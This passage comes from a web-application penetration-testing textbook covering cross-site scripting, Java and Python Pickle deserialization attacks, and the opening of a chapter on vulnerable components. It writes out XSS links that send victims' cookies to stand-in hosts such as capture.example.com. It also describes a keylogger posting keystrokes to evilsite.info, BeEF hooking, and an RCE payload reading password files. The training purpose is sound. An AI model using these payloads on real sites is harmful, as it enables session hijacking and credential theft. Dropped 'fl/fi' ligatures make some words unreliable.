the usernames and passwords (among other artifacts) from the compromised
browser, but they all referenced other web applications and out-of-scope sys-
tems.
In this situation I had to make a call, literally, and spoke with my primary
point of contact at the organization that hired my company to conduct the
penetration test. Client-side attacks (such as using BeEF to attack users)
were in-scope, but using user credentials to login to personal webmail ac-
counts for example (for reconnaissance or social engineering attacks) was a
gray area. While this topic was discussed and accounted for in the rules of
engagement, prior to taking the next step a phone call was warranted. My
OWASP A7:2017 Cross-Site Scripting (XSS) 123

point of contact denied the request to use the obtained credentials, so I fo-
cused my attention on other modules such as a custom dialog box. I used
BeEF to produce a prompt asking the user to resubmit his credentials to the
application "Your session is about to expire..." and was able to obtain his
username and password, even better than his cookie!
With this information I was able to simply login to the application as
this user which provided me with an elevated level of privilege. Additional
functionality was enabled with this access, and a subsequently identied in-
jection vulnerability eventually provided shell access to the system. From
XSS to SQLi to shell; not an entirely uncommon approach as sole XSS rarely
can be parlayed into injection or other direct server-side exploitation.

How to Exploit: We exploit XSS with specically crafted payloads de-


pending on the attack surface of the application. For instance, the size of the
input box (the length of characters it supports) will play a pivotal role as
we devise our payload; mainly, how large our payload can be. However, XSS
aws are not by any means limited to input boxes. Determining whether the
vulnerability is server, or client-based also dictates our avenue of attack as
does our ability to store the attack, reect it, or attack the DOM. The most
potent XSS attacks are stored server-side, as our payload will reside in the
vulnerable application's database, and potentially be served to many victims.
In contrast, a server-side reected attack, for instance, typically requires us
to choose the target victim(s) perhaps with a phishing campaign. For this
reason, we ideally want to leverage the more impactful vulnerability but still
focus on identifying all of the application's XSS vulnerabilities. Recall that
our objective during a penetration test is to identify aws, exploit the aws,
and arrive at a clear, evidence-based risk rating for each nding. We provide
this information to business leaders so they can remediate the ndings ac-
cordingly, or at least have the information to make an informed decision as
it aligns with their risk tolerance.
Conducting a thorough review for XSS aws hinges on the quality of our
mapping and the tools we use to aid in our eorts. It's not usually feasible
to manually insert an XSS string into every injection point and determine if
the payload executes or not. On large applications this approach would fail
due to time constraints, and on any sized application this approach would be
a fail due to the ineciency. Thus, leveraging a tool is the best approach; we
do however need to know how XSS tools work to help us quickly vet their
reports to eliminate false positives and hone in on the higher risk true posi-
tives (as well as tune them to yield the best results). To review the output
124 The Penetration Tester's Guide to Web Applications

of the report, most XSS injection tools will provide a PDF, HTML, or text-
based output le consisting of the attack payload and the resulting response
from the server. The problem with the results of the test being delivered in
this way is that we can't conrm there is an XSS aw if the payload doesn't
execute in the browser (any browser). Two important takeaways from the
last sentence are the concept of the browser executing the code as well as
the mention of "any browser". First, many web application scanning tools
will report the existence of XSS aws, provide the applicable HTTP request
(with the payload), show the resulting HTTP response (also with the pay-
load), and conclude the application/parameter is vulnerable to XSS based on
this result. We then have to take this information and duplicate the nding
using our browser to ensure it's not a false positive; just because the pay-
load is present in both the request and response doesn't mean it will execute
in the browser. This leads to the next point; the browser is where the pay-
load executes... but what if the browser is actively blocking the execution of
the payload? Does this mean the application is not vulnerable? The answer
is no. Dierent browsers have dierent JavaScript engines, APIs, supported
features, and ways of parsing code, meaning a given payload may execute in
the Midori and Maxthon web browsers, but not Chrome and Edge. Further-
more, when an application is congured to set the enabled X-XSS security
header, compatible browsers will enable limited built-in protections against
some reected XSS attacks. In these cases, the underlying application is still
vulnerable; however, we need to show the impact, and when the impact con-
sists of a minute amount of actual users which could be impacted by the aw,
we have to take that into consideration when calculating the risk ranking of
the nding.
In eect, when we use tools to help identify XSS aws, we still need to
manually conrm the nding, and more importantly, weaponize a payload.
The string, "<script>alert("xss");</script>" is very often used to test for
XSS, and in turn makes its way to penetration testing reports as evidence,
an example of which is shown in Figure 8.2.
OWASP A7:2017 Cross-Site Scripting (XSS) 125

Figure 8.2 Common XSS alert dialog.


While this string and resulting execution of code are useful to quickly conrm
the existence of XSS, we are conducting a penetration test, not a vulnera-
bility scan, and in doing so we need to show the potential for harm, not
just the existence of the aw. In short, we need to modify the payload to
achieve a more potent result. To do so we need to have a deep understanding
of JavaScript and HTML as these two languages are what the web is essen-
tially built upon, and our end goal of manipulating the DOM, what a user
experiences, is contingent on our crafted code.
Some XSS attacks are straightforward, such as stealing cookies. To do
this we need to setup an internet-facing server to listen for/log requests,
and simultaneously have our payload execute in a victim's browser. The XSS
payload could consist of a GET request to our attacker controlled IP/domain,
and append the document.cookie property to dump all of the cookies as
part of the HTTP GET request pointed at our server. The attack could be
delivered via an email as part of a phishing campaign, as seen in Figure 8.3.

Figure 8.3 Phishing email with XSS link.


126 The Penetration Tester's Guide to Web Applications

Hovering over the link shows a URL of (separated by multiple lines for read-
ability):

https://evilsite.info/search?query=<script>document.location='
https://cookiecapture.example.com/cookiestealer.php?
cookie='+escape(document.cookie)</script>

The evilsite.info domain in this example is a vulnerable website with the


XSS vulnerability located in the "search" page's "query" parameter. The
link in the phishing email is exploiting this vulnerable parameter with a
JavaScript payload instructing the browser to make a new HTTP request
to the appropriately named cookiecapture.example.com domain. Included in
the HTTP request is a reference to a php page (cookiestealer.php), a pa-
rameter (cookie), and the escaped document.cookie property, which will be
populated with all the cookies the victim has stored in her browser for evil-
site.info. When the victim clicks the link in the email, the browser is used to
handle the HTTP request and in doing so, submits the attackers malicious
JavaScript (the XSS payload) to evilsite.info for which the victim hypotheti-
cally is logged into at the time. This malicious request included a component
to automatically make a new HTTP request, and in doing so, sent the vic-
tim's cookies to the attacker as any request to cookiecapture.example.com
is logged, and most importantly in this example, the full URI is logged,
which includes the victim's cookie. Viewing the Apache logs on cookiecap-
ture.example.com shows all of the logged requests and captured cookies. With
that let's move onto examples of how to execute such an attack and further
weaponizing of XSS.

Examples: Let's begin by introducing some tools to help identify potential


XSS vulnerabilities. The rst is XSSer, which is a Python-based tool we can
run from the command line or GUI to help nd vulnerabilities. While seem-
ingly robust, the tool has its aws as not all features are fully implemented,
and bugs emerge during use. However, it is useful as a baseline tool to help
see how some XSS attacks work. On the CLI we can invoke it as we would
invoke sqlmap such as by specifying a target URL, custom user-agent, and
verbosity. This can be seen in Figure 8.4.
OWASP A7:2017 Cross-Site Scripting (XSS) 127

Figure 8.4 XSSer Command Line Interface Syntax.

When running, we can view the real-time logs depicting what the tool is
doing (which URI it is attacking/crawling, the payload it is sending, various
headers) and see if/when it identies a vulnerability. Outputting the results
of the testing to a le enables a quick grep (seen in Figure 8.5) to identify
the attack strings it is sending, cat LOGS | grep 'attack with'.

Figure 8.5 XSSer Logs showing submitted payloads.

The GUI provides a wizard, custom settings, and a nice feature of building
the CLI command based on our preferences in the GUI. We can see this once
we specify our settings and click the "Aim" button as seen in Figure 8.6.

Figure 8.6 XSSer GUI output.

Once vulnerabilities are identied with this tool, we will want to manually
provide a payload to exploit the aw. A great way to do this and ignore
character restrictions on the vulnerable parameter's input is by specifying
our own remote code. By doing so we can pull in an entire library, thousands
of lines of code (with one XSS command). This will in turn inject the full
exploit into our victim's browser; we do this by specifying the path to our
hosted payload. Keep in mind we do need to host the malicious JavaScript
somewhere on the web for this work, yet another reason for a VPS or cloud-
hosted server to be included as part of our standard tool-set. Alternatively,
in a lab environment, we could simply host the script locally to simulate
the same concept. However, know that in a real-world scenario, we will need
to host the malicious code from an HTTPS-enabled website with a valid
TLS certicate to ensure the browser loads content correctly (as opposed to
throwing an untrusted content error and refusing to load the JavaScript).
Let's explore injecting a keystroke logger as our payload.
128 The Penetration Tester's Guide to Web Applications

In this example, as with any real-world XSS scenario, there is a vulnerable


application, the attacker, and a victim user. The application takes user input
via the message and name parameters, stores the input in a database, and
later serves it to other users requesting a given page. First, we need to identify
the aw, and to do this we execute a scan with XSSer in a fashion similar to
what was provided as a previous example. Once it nds a vulnerable parame-
ter/request which we can validate, we want to work on crafting our keystroke
logging payload and subsequently injecting it. To do this successfully requires
some initial setup, not just the proper syntax for a working keystroke logger
but also the conguration of the hosting/logging server. Let's work on the
code to log keystrokes; we'll name the le "k.js". This JavaScript will dene
a new function leveraging the onkeypress event which will occur every time
a key is pressed. Once a key is pressed a XMLHTTPRequest will submit the
value of the pressed key to our logging server "evilsite.info/log.php". This
Server is also the hosting server as evilsite.info has this "k.js" le hosted in
"/var/www/html/k.js". Figure 8.7 shows the applicable code.

Figure 8.7 Keystroke logging JavaScript.

We inject this malicious code into the vulnerable application by using the
"src" attribute in our payload and dening the location of where the script is
located. To be clear, the vulnerable website has a form (as depicted in Figure
8.8), we are submitting a script into the form, and subsequently the script
will be included as part of the page the victim visits at a later time.
OWASP A7:2017 Cross-Site Scripting (XSS) 129

Figure 8.8 Vulnerable form.

Now when the victim user browses to this same web application and sub-
mits their name and message, the resulting page loads in their browser and
includes our malicious JavaScript. This JavaScript will proceed to log every
subsequent keystroke made while on the exploited page. While the payload
is persistent (stored in the back-end database and served to unsuspecting
visitors), it only executes on this one page on this one web application until
a victim browses somewhere else or closes the browser. The payload works
well in this context and we can see in Burp that each time a key is pressed, a
POST request is being sent to evilsite.info/log.php (Figure 8.9) with a simple
payload of the parameter "k" and the value of the key which was pressed.
130 The Penetration Tester's Guide to Web Applications

Figure 8.9 Each keystroke creates a POST request.

At this point we can see the keystroke logging JavaScript is working as in-
tended and now we need to focus on logging the results. Using PHP (or most
any language we want), we can write a few lines of code to handle the POST
request, open and append the results to a le, and account for potential is-
sues. Note that SELinux may be a hurdle and the "keylog.txt" le, referenced
in Figure 8.10, will need to be writeable for PHP to be able to write to it.

Figure 8.10 PHP code handling the logging of each keystroke.

Looking at the results of the exploit we can see the payload submitted by
one of the victims.
OWASP A7:2017 Cross-Site Scripting (XSS) 131

Figure 8.11 Final results of logged keystrokes.


Next let's reexamine the details of launching a credential stealing attack.
Earlier in this chapter we discussed one of the more common XSS attacks,
which is to steal a cookie. While simply enabling the HTTPOnly ag on a
cookie prevents any JavaScript from being able to read its contents, it is
very common for this ag to not be set even on a session token. Because of
this there is value in detailing how to craft this exploit. Once the vulnera-
ble parameter has been identied we have to understand if the vulnerability
manifests itself as stored or reected (or DOM-based). While the attack will
be similar in both situations the delivery will be dierent. Recall the re-
ected attack requiring the payload (entire attack string) to be sent to the
victim via a side-channel such as email. The specics/code to make this
work will consist of the XSS attack sent from the attacker (using email) to
the victim (opened using an email client and sent using a browser) to the
web application (from the victim's browser). This time by using the Python3
tool XSStrike invoked from the command line as python3.6 xsstrike.py -u
"http://example.com/xss.aspx?name=name" we are able to identify several
identied reected vulnerabilities, as we can see in Figure 8.12.

Figure 8.12 XSStrike identifying XSS vulnerabilities.


132 The Penetration Tester's Guide to Web Applications

With this information we can proceed to manually verify the results and
craft a suitable payload. The fact the vulnerability is a reected GET re-
quest makes our job easier, as we can utilize the address bar in our browser
to tweak the payload and immediately see the results. This also bodes well
as we need the vulnerability to be exploitable via the GET method for our
planned email delivery mechanism to work. In the event the vulnerability is
found via a POST request, we can often simply convert the POST request to
a GET request by examining the contents of the POST payload and recon-
struct them as GET parameters. As an aside, when we can convert a POST
request to a GET request this is called a method interchange vulnerability. In
order to steal a victim's cookies, our payload can consist of a reference to the
vulnerable web application and a redirect request appending all of the avail-
able victim cookies for the domain as a string sent to our attacker-controlled
web server. To test the code, we can submit a request with an alert box show-
ing the cookies for the domain (as shown in Figure 8.13) of the vulnerable
web application: <script>alert('document.cookie');</script>.

Figure 8.13 Alert box showing the value of the cookie.

We'll add onto this with the redirect code to tell the victim's browser to make
a new HTTP request to our server, but in the request, include the cookies the
browser has saved for the current web application it is visiting. Once again, to
be clear, the victim user browsing to evilsite.info has a session token/cookie
(PHPSESSID) denoting that the user is logged into the evilsite.info web ap-
plication. When the victim receives our crafted XSS attack via email, their
browser will load the request to evilsite.info and make a new request to a
malicious site of our choosing while including the PHPSESSID cookie from
evilsite.info in the new request. In this way we are able to steal the cookie
because it is sent directly to a location of our choosing, from the victim's
browser, per our email link containing the malicious request. The redirect
OWASP A7:2017 Cross-Site Scripting (XSS) 133

code is nothing more than "document.location=capture.example.com"; how-


ever, we need to add more code to the redirect and congure logic/PHP on
example.com to successfully log the request. The nal link and XSS payload
to be delivered via email to the victim consists of the following (separated
by multiple lines for readability):
https://evilsite.info/search?query=<script> document.location=
'https://capture.example.com/cookiestealer.php?cookie= '
%2bescape(document.cookie)</script>
Once the victim clicks on this, which some people actually would/do  and
it could be "hidden" with an HTML link tag or obfuscated with encoding
their PHPSESSID cookie is sent to capture.example.com/cookiestealer.php.
The PHP code comprising cookiestealer.php is responsible for logging the
cookies that were submitted. The cookie value is logged, and the victim is
redirected back to the page where the form submission came from to help
reduce suspicion. The PHP shown in Figure 8.14 handles logging the session
tokens.

Figure 8.14 PHP code to log the victim's cookies.

At this point we are able to use the compromised cookie to access the applica-
tion as the victim user. We can do this by using our browser/add-ons to alter
our current cookie to that of the stolen value or by using our interception
proxy to modify the cookie being transmitted to the web application. For
instance, navigating to Burp's "Project Options" -> "Sessions" -> "Cookie
Jar" section (shown in Figure 8.15) allows us to modify our current PH-
PSESSID cookie to the new value. Any subsequent requests to evilsite.info
will include this compromised cookie value and grant us the same level of
privilege as the compromised user/session. Note that once we or the legiti-
mate user logs out of the application, the cookie is no longer valid.
134 The Penetration Tester's Guide to Web Applications

Figure 8.15 Burp's cookie jar.

Finally let's explore BeEF. The browser exploitation framework is specically


designed to maximize the damage we can inict on users with XSS. The
framework comes preinstalled with Kali Linux and allows us to hook our
victims for a somewhat persistent experience. Recall that our XSS attack only
works when the victim is actively running our payload; the entire exploit takes
place in the execution of JavaScript. This means that once a victim closes
their browser, our attack is no longer executing. This is more relevant as we
explore BeEF and use it less as a tool to launch a single attack and more
as a tool to launch a series of attacks depending on the victim's browser
and technology. To get a better understanding of its capabilities, we can
launch the administrative interface of BeEF in Firefox and hook ourself using
Chrome. With this setup we can see the multitude of options available for us
as an attacker. We start beef from the command line by typing, "beef-xss",
which will in turn show us the relevant information to access the UI, hook a
victim, and even launch our default browser; we can see this in Figure 8.16.
The default credentials to login are beef:beef.
OWASP A7:2017 Cross-Site Scripting (XSS) 135

Figure 8.16 Initial BeEF startup.


To test the features we can point Chrome to /demos/butcher/index.html,
which essentially serves the "hook.js" le. Once hooked, the Chrome browser
can be attacked from the control panel, visible in Figure 8.17.

Figure 8.17 Potential commands to run.


The available commands drastically increase once we integrate BeEF with
Metasploit, as does our ability to attack the victim. Targeting a hooked
victim with Adobe Flash pop-ups, or a Facebook password reset request, is
a great way to incorporate social engineering into our attack. Modules exist
to take pictures with an integrated camera, turn on the microphone, gather
keystrokes, dump passwords, and the like. However, with these modules one
realizes that they often don't work for various reasons.

Link to hands-on portion: https://tptgtwa.com/owasp7


Root Cause and Conclusion: This chapter included several instances of
what is in-scope or otherwise allowed per the rules of engagement. More
136 The Penetration Tester's Guide to Web Applications

often than not, attacking the user of an application is not allowed and in
these situations, a simple alert box proving the existence of the XSS aw
may actually be sucient. If the client/business fully grasps XSS and the
risks associated with this aw, then we likely don't need to spend more time
crafting a robust exploit, especially if we don't have a target victim for the
attack. Conversely, when attacking users is allowed, we need to be prepared
to launch more complex attacks such as harvesting credentials, obtaining ses-
sion tokens, defeating XSRF protections, and directly attacking the browser.
Several tools exist to help nd XSS aws but the onus is on us to create a
working payload specic to our target application. In most cases we need a
remote location to store our code (or have the victim connect to), in order
for our attack to be fruitful. XSS attacks can be potent but the adoption
of content security policies, browser defense mechanisms, and better coding
practices/frameworks makes our job more challenging. Because of this, hav-
ing mature tools and relying on our reproducible methodology are keys to
successfully identifying XSS. Once identied, our ability to exploit XSS in
a meaningful way relies on our skill set and quality of tools, the latter of
which can be eeting. Before conducting any penetration testing, we always
have explicit written permission, and when we incorporate potent XSS at-
tacks targeting users of the application, we want to make sure this topic has
clearly been discussed and included in the rules of engagement.
Chapter 9

OWASP A8:2017 Insecure


Deserialization
Denition: Insecure deserialization often leads to remote code execution.
Even if deserialization aws do not result in remote code execution, they can
be used to perform attacks, including replay attacks, injection attacks, and
privilege escalation attacks.

Details: Insecure deserialization was added to the OWASP top ten for 2017
based on input from the information security community as we have seen a
signicant uptick in this type of aw being exploited along with the potential
for abuse. To understand this aw, let's take a moment to discuss serializa-
tion. The process of serializing objects or data means to convert data from
a less-than-ideal form for transmission to a byte-stream (commonly using
JSON) that can easily be sent across the wire. Typical objects which are se-
rialized might be arrays of data or binary data structures. The reason these
objects are serialized is so they can easily be sent from the client to the server
while preserving the structure of the data  the data attributes, elements,
and hierarchy. A typical object might look like Figure 9.1.

137
138 The Penetration Tester's Guide to Web Applications

Figure 9.1 Example object which might benet from serialization.


This example object contains a nested array and would be challenging to
transmit in this format while maintaining its integrity and ease of access/use
by the receiving party. For this reason, it is best to serialize this object,
which in turn, would result in essentially converting the object to a string.
An example of this object being serialized is shown in Figure 9.2.

Figure 9.2 Results of serializing the object.


The content of the object stays the same while the format changes to ac-
count for a means to organize the data so it can be easily deconstructed
and understood by the application/language and persisted to disk. All of
the most popular web programming languages have the capability (either
natively or via a third-party library) to serialize and deserialize data. Thus,
as we continue the conversation we should know that deserialization aws
are not OS, platform, or language-specic. As we can see with this JSON
example, we are merely using the syntax of JSON (brackets, curly brackets,
commas, and colons) to denote the level of nesting for the items in the object.
The same idea of serialization can be achieved in XML and other formats as
well (BSON, YAML, etc.). The end result is a data structure converted to a
string. This is useful for web applications as this process not only allows the
object to be sent and parsed easily, but also reduces overhead and storage
concerns when done properly.
Deserializing is simply the process of converting the serialized string back
into the original data structure. The aw of insecure deserialization shares
similarities with other web application aws in that during the process of
converting the string, if there is malicious input not accounted for, we can
OWASP A8:2017 Insecure Deserialization 139

cause harm to the application. This should be reminiscent of XXE from the
perspective of a vulnerable parser; this should also be reminiscent of injection
from the perspective of inserting a malicious payload. Exploiting this aw can
lead to privileges escalation or otherwise bypassing access controls as well as
denial of service and remote code execution. The attack surface for exploiting
this aw consists of client-controlled input which will be serialized and sent
to the server. Thus, the way we attack this aw is by injecting malicious
code into an object we can control. Typical places to look for serialized data
range from cached storage objects and APIs to cookies, View State, HTTP
headers, and parameters.
Identifying insecure deserialization takes eort and builds on our previous
work of reconnaissance and mapping. During these phases of our methodology
we should have been able to determine the platform, including programming
language(s) being employed by the application. While this aw is technology
agnostic, the way we identify and exploit it is very specic. For Java-based
applications there are several indicators of a serialization process being used
such as an HTTP header including, "application/x-java-serialized-object" as
well as r0O (the letter r, the number 0, and the letter o) in base64 encoded
data as well as a HEX signature of AC ED 00 05. For C Sharp/.NET appli-
cations we can leverage our proxy and search for a base64 encoded string of,
"AAEAAAD/////" as well as client-side code containing the strings, "Type-
Object" and "$type:" as these are all indicators of a serialization process in
place. We can also use other previously described tools to help identify com-
ponents which may be vulnerable to this aw (such as third-party libraries).
If we have access to the source-code, as an in-house penetration tester, know
that there are additional language-specic checks we can perform.

Real-World Dialog: I was engaged with a start-up to assess their agship,


soon to be deployed publicly web application, and the development team
had little experience in writing secure code. Every single OWASP top ten
vulnerability was discovered throughout the penetration test to one degree
of risk or another. Even with injection, XXE, and sensitive data exposure,
there was still more to be gained with the exploitation of a deserialization
vulnerability. The application was Java-based and having the mostly reliable
tool "Java Serial Killer" at my disposal, an attack was crafted to gain shell
access on the system.
The exploit worked with little eort and I proceeded to escalate privilege
to get root access via a SETUID binary. With root access on one machine I
was able to attack and pivot to other systems by abusing unencrypted net-
140 The Penetration Tester's Guide to Web Applications

work communications via a man-in-the-middle attack including targeting AD


joined Windows machines. Pivoting once again from the DMZ to the corpo-
rate LAN at the organization's headquarters was particularly interesting and
somewhat challenging due to all publicly facing systems being hosted in the
cloud. Still, service accounts had to access some machines and when updates
or AV detection stopped working, an administrator logged in locally to ad-
dress the issue, which provided me access with a valid token. From there,
coupled with a lack of two-factor authentication, I was able to VPN into
the corporate environment and continue pivoting, compromising, and sur-
reptitiously obtaining sensitive information. The engagement only lasted one
week. The primary goal was to focus eorts and time on the application, but
with each compromised system, a call was placed to the main point of contact
to communicate the current situation and agree on the next steps. A primary
goal of any penetration test is to accurately measure the risk a given vul-
nerability poses to the organization, and with the help of one deserialization
aw, the entire company was at risk.

How to Exploit: Exploiting insecure deserialization can be achieved by


identifying a vulnerable injection point we can control, and crafting a suitable
payload to take advantage of the deserialization process. We can accomplish
this with the help of some scanning tools previously discussed and via manual
methods. In looking at the URL or page of an application, we can't readily
determine if it is vulnerable, and we need to look deeper for indicators of
weakness. As with other web application specic aws, two of the best tools
to help with this process are our browser and proxy. By sending a request to
the application and observing the response, we may be able to determine if the
application is using serialization. As discussed, we can look for indicators in
HEX, base64, and HTTP headers. A graphical representation of a serialized
object in the HTTP headers is shown in Burp's interface in Figure 9.3.

Figure 9.3 HTTP response header indicating serialized object.


Based on the response indicating the existence of a serialized object, we
want to look back to the original request which resulted in the application
returning a serialized object and determine what, if any, of the input we can
OWASP A8:2017 Insecure Deserialization 141

modify to alter the resulting serialization process. One way to help determine
which input results in modied output is by using Burp's repeater, akin to
ZAPs Open/Resend request editor. By using this tool, we can visually see a
dierence in responses after we make a change to the input, or we can select
two requests from the proxy history and choose to send the responses to
the Comparer tool in order to accurately identify a change in the serialized
output. An example of this is shown in Figure 9.4.

Figure 9.4 Burp's Comparer showing seven color-coded dierences between the two
responses.

Once we know our input has a measurable impact on the serialized output,
we can identify which exact input we need to fuzz. To help with the task
of identifying and eventual exploitation of this aw we can use several Burp
extensions: Java Deserialization Scanner (for PRO versions of Burp), Java
Serial Killer, and Java Serialized Payloads. By sending the POST request to
the Java Deserialization Scanner extension, we can then set the applicable
insertion point as we would with an intruder scan, as seen in Figure 9.5.
142 The Penetration Tester's Guide to Web Applications

Figure 9.5 Setting an injection point using the Deserialization Scanner.


The tool works by sending library specic attacks with a sleep payload in
order to determine if the application is utilizing one of the libraries and if so,
conrms the vulnerability. In this sense the discovery portion is benign, but
useful in validating the use of a vulnerable library. The results of the initial
scan conrm if a vulnerability has been found as seen in Figure 9.6.

Figure 9.6 Viewing results of the scanning tool.


The next step is to attempt to exploit the identied vulnerability using the
same Burp extension and simply choosing, from within the "Manual Test-
ing" tab, a right-click to send the attack to the "Exploitation Tab" within the
same extension. Again we proceed to select an insertion point, the same one
found to be vulnerable based on the initial results, and we select a custom
payload. Note that we are leveraging the yoserial jar which we installed as
part of the extension installation. The yoserial jar is a utility for generating
payloads to aid in attacking vulnerable Java implementations. So, while we
are setting a custom payload to execute, this utility helps to make sure our
OWASP A8:2017 Insecure Deserialization 143

payload is constructed in a way to enable our attack to succeed. A suitable


payload would be an OS command, as our code will run at the OS layer of
the application in this circumstance based on the platform/implementation
we are attacking. For a Linux OS known to be running Java and a webserver,
a suitable command might be to deploy a war le with a JSP shell or at-
tempt to deploy a python listener or focus on account/SSH access. When
submitted, the payload may not show the results of the command in the ap-
plication/browser (like "ls" results) and when executed successfully, we are
once again restricted to the level of permission under which the current web
application is running. Another useful tool to aid in exploitation is the Java
Serial Killer extension in Burp. The setup process is very similar to any other
attack we want to launch, but a noteworthy dierence between this tool and
the Deserialization Scanning tool is the absence of a Pro version of Burp.
The Java Serial Killer runs in the community edition, and we can leverage
it by sending a suitable request from the proxy feature to this extension.
Conguring the attack consists of a similar process when compared to the
Deserialization Scanner in that we will select an injection point, a payload,
and submit the request. However, we need to manually choose which library
to target as well as to serialize our attack string with optional base64 encod-
ing. This is important because without encoding the payload, the attack may
not work. We can see an example of this in Figure 9.7.
144 The Penetration Tester's Guide to Web Applications

Figure 9.7 Launching an attack with Java Serial Killer tool.

Java, PHP, Python, node.js, .NET, Ruby, and other languages can be sus-
ceptible to this type of attack although the tools we use to exploit other
language-specic vulnerabilities will vary. Let's take a look at some examples
of full exploitation.

Examples: To elaborate on what has already been discussed, we can focus


on another vulnerable platform, Python. To exploit a deserialization vulner-
ability in a Python application, we can leverage the same base set of tools
with some modications.
The example target web application is running Python, which uses Pickle
for serialization and deserialization, and is also known to be vulnerable to
deserialization attacks. When browsing to the application we want to take
care to pay attention, using our proxy history, to the requests we are making
as well as other background or subsequent requests made as part of the
page loading or JavaScript/AJAX interactions. In looking at the application
(shown in Figure 9.8) we see there are multiple inputs, and when viewing
the requests and responses throughout the mapping process we see there is
evidence of serialization.
OWASP A8:2017 Insecure Deserialization 145

Figure 9.8 Viewing the inputs on the potentially vulnerable website.

With this information we can try to launch a serializtion attack; even without
this information we could blindly try. However, in looking at the HTTP
response headers (depicted in Figure 9.9) we can see the CGI language is
Python and using this knowledge we can craft a suitable attack.

Figure 9.9 Viewing the HTTP headers and noting the CGI language.

The vulnerable web application takes multiple forms of input via text inputs
as well as a le upload feature. We can use our interception proxy to get
an idea of what a valid POST request looks like when constructed using the
selections from the drop-down menus in the form. In looking at the payload
of the POST request we can see there are four parameters: Date, Record
Name, Author, and Recipient. Submitting a request immediately shows the
results in the lower portion of the page with the input name and value in
a table format. We can see this in Figure 9.10. Uploading an unformatted
le results in a 401 HTTP response, however. While the application is likely
using Python, indicators of serialization are in fact not readily evident.
146 The Penetration Tester's Guide to Web Applications

Figure 9.10 Results of successful POST request showing inputted values.


Focusing on the form's upload feature, we can attempt to submit serialized
data in the hopes it will be deserialized insecurely by Python. To do so, we
rst need to look at a typical use-case within Python to see how this normally
works with Pickle, a Python module used specically for this process. Figure
9.11 shows a Pickle reference.

Figure 9.11 Python reference for pickling.


The example code also comes with a sample of how to use the class. We can
see a minmial working example in Figure 9.12. From here we gather how the
ow of input is handled and returned, as well as how the loading and reading
of the lines from a given le are processed. While we can't see the source
code of the vulnerable application during a black box engagement, we can
infer, hypothesize, and test.
OWASP A8:2017 Insecure Deserialization 147

Figure 9.12 Python example for pickling.

To that end we can write our own python script, upload it to the application,
and depending on how the application processes it, perhaps get our code to
execute. We know that during a serialization attack our input will rst be
serialized, by us or the application, and then subsequently deserialized in an
unsafe manner. We can once again infer that our attack is making it past the
deserialization process, is syntactically correct, and meets the requirements
of application's upload feature based on the responses or errors we receive
when uploading the le.

Figure 9.13 Initial exploit code showing desired command to execute.

Simply uploading the code described in Figure 9.13 will not suce as the
function has no way to be called and executed. Thus, we would want to alter
our attack to leverage a multi-upload approach in which one le gets uploaded
and a second uploaded le references a function in the rst to execute the
code based on the deserialized construct. Or we could take advantage of
the pickling process to dene a function which, when deserialized, will be
executed. We can see this in Figure 9.14.
148 The Penetration Tester's Guide to Web Applications

Figure 9.14 Initial exploit code showing desired command to execute.


Upon successful upload, the OS command of cat /etc/pass is executed and
we see the results of the output in the application, which is visible in Figure
9.15. Other attacks are blind in the sense that we won't immediately see the
results as with other injection-based attacks.

Figure 9.15 Initial exploit code showing desired command to execute.

Link to hands-on portion: https://tptgtwa.com/owasp8


Root Cause and Conclusion: Insecure deserialization can be a signicant
issue for web applications due to the potential exposure when exploited. The
root cause of this vulnerability stems from utilizing untrusted data as part
of the deserialization process, but is less focused on insecure libraries than
on a lack of process surrounding the application's data ow. Because of this,
it can be challenging to remediate this aw without time-consuming archi-
tectural changes. For some organizations the changes are minor depending
OWASP A8:2017 Insecure Deserialization 149

on the impacted code/processes in place. From an attacker's perspective, we


need to ensure we are adding checks for this aw into our mapping and scan-
ning phases, as well as identifying when serialization is occurring to hone in
on potential attack surface. Depending on the implementation, this aw can
result in escalating privilege and even remote code execution; while deserial-
ization aws are not extremely common, the potency of an attack can lead to
a nding. There are also tools to help with this attack for multiple platforms
that ease the eort of exploitation.
Chapter 10

OWASP A9:2017 Using


Components with Known
Vulnerabilities
Denition: Components such as libraries, frameworks, and other software
modules, run with the same privileges as the application. If a vulnerable
component is exploited, such an attack can facilitate serious data loss or
server takeover. Applications and APIs using components with known vul-
nerabilities may undermine application defenses and enable various attacks
and impacts.

Details: There are similarities with OWASP 9 and OWASP 6 (Security


Misconguration), the main dierence being securely conguring elements of
the application as opposed to incorporating vulnerable components; there is
overlap, but what we are looking for and how we exploit each is distinct.
One of the more challenging parts of modern web application develop-
ment is the inherent complexity with every newly developed application. It
is rare to come across a simple implementation, which of course is subjective.
Some reasons for this are due to the very low bar to entry; with very little
money, anyone with the knowledge can create their own application. This
is how lots of developers start their career  with a github account, code
examples, contributions to projects, and practice. Technology is very cheap
and open-source software is prolic. There is no one right way to imple-

151
152 The Penetration Tester's Guide to Web Applications

ment technology; competing solutions oer their own pros and cons so that
anyone from individuals to fortune 500 companies, is free to develop the sys-
tem that best meets their needs. When discussing open-source software and
technology, we have to understand that a signicant amount of software is
supporting the web application from the stack, which we already discussed, to
authentication/authorization services, containerization, frameworks, parsers,
APIs, microservices, analytics, payment processing gateways, a plethora of
third-party code, and underlying technology. This technology directly or in-
directly supports the web application we are responsible for testing and thus,
the onus is on us to understand and test it for susceptibility to weaknesses.
We can typically leverage NVD, security advisories, bug trackers, GitHub
issue trackers, and the like to thoroughly search for known vulnerabilities
for a given set of components. Identifying the components is straightforward
for all client-side technology, but more challenging for server-side software.
There are several automated scanning tools which will help nd vulnerabil-
ities based on version numbers, but of the hundreds of thousands of known
software vulnerabilities, only a fraction of vulnerability scanning tools have
checks built to identify them.
Anyone can write software and publicly release it just as anyone can
choose to use that software (with some restrictions), but what happens when
no one updates it? What happens when a vulnerability is discovered, and
patched, but that patch is never installed? What happens when a business
has hundreds of applications, patches them regularly, but is not aware of all
dependencies? In each one of these situations there is attack surface. We need
to recognize this attack surface, identify applicable aws, nd a matching
exploit or write our own, and measure the subsequent risk of the vulnerability.
Depending on the criticality of the application and its level of sensitivity,
using components with known vulnerabilities can be more devastating than
all other entries on the OWASP top ten list. Remember Equifax?

Real-World Dialog: The year 2014 was signicant for critical security vul-
nerabilities being released. Some of the most impactful aws were Drupalged-
don, ShellShock (Bash Bug), and Heartbleed. I was a Senior Security Engineer
working in the nancial sector for a billion-dollar entity, and was responsible
for, among other things, identifying our company's exposure to these critical
vulnerabilities. Heartbleed ended up being the biggest threat for us.
At that time our threat and vulnerability management program was ma-
